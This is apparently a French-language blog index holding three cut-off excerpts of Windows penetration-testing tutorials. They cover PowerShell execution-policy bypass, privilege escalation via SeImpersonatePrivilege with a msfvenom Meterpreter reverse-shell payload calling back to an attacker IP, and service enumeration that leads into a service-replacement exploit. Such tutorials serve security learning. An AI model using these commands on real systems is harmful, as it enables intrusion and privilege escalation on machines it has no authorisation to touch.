Obtenir un maximum d’informations sur un domaine (sans powerview)

Introduction à Active Directory et Kerberos Un AD contient plusieurs domaines et organisation unit(OU) Introduction à PowerShell Get-Help * Liste tout l’aide disponibile Get-Help process Liste tout avec le mot-clé “process” Update-Help Update-Help Get-Help Get-Item -Full Get-Help Get-Item -Examples Get-Command -CommandType cmdlet Outrepasser les politiques d’exécution PowerShell powershell -ExecutionPolicy bypass powershell -c powershell -encodedcommand $env:PSExecutionPolicyPreference=”bypass” … Continuer la lecture

Exploitation des privilèges SeDebugPrivilege, SeImpersonatePrivilege

Si on se rend compte que nous avons les privilèges SeDebugPrivilege, SeImpersonatePrivilege, nous pouvons obtenir le compte system, en utilisant le module incognito de meterpreter Nous créer le code initial pour avoir une session meterpreter msfvenom -p windows/meterpreter/reverse_tcp -a x86 –encoder x86/shikata_ga_nai LHOST=10.9.0.24 LPORT=6666 -f exe -o shell.exe Téléchargement du code sudo python -m http.server … Continuer la lecture

Service sous windows

Trouve les services qui ne sont pas ceux de Windows wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows" Quel est l’usager exécutant un service sc qc SERVICE_NAME Vérification si on peut écrire dans un répertoire powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list" Remplacement d’un service par un autre (exploit) Wrapper.cs using System; … Continuer la lecture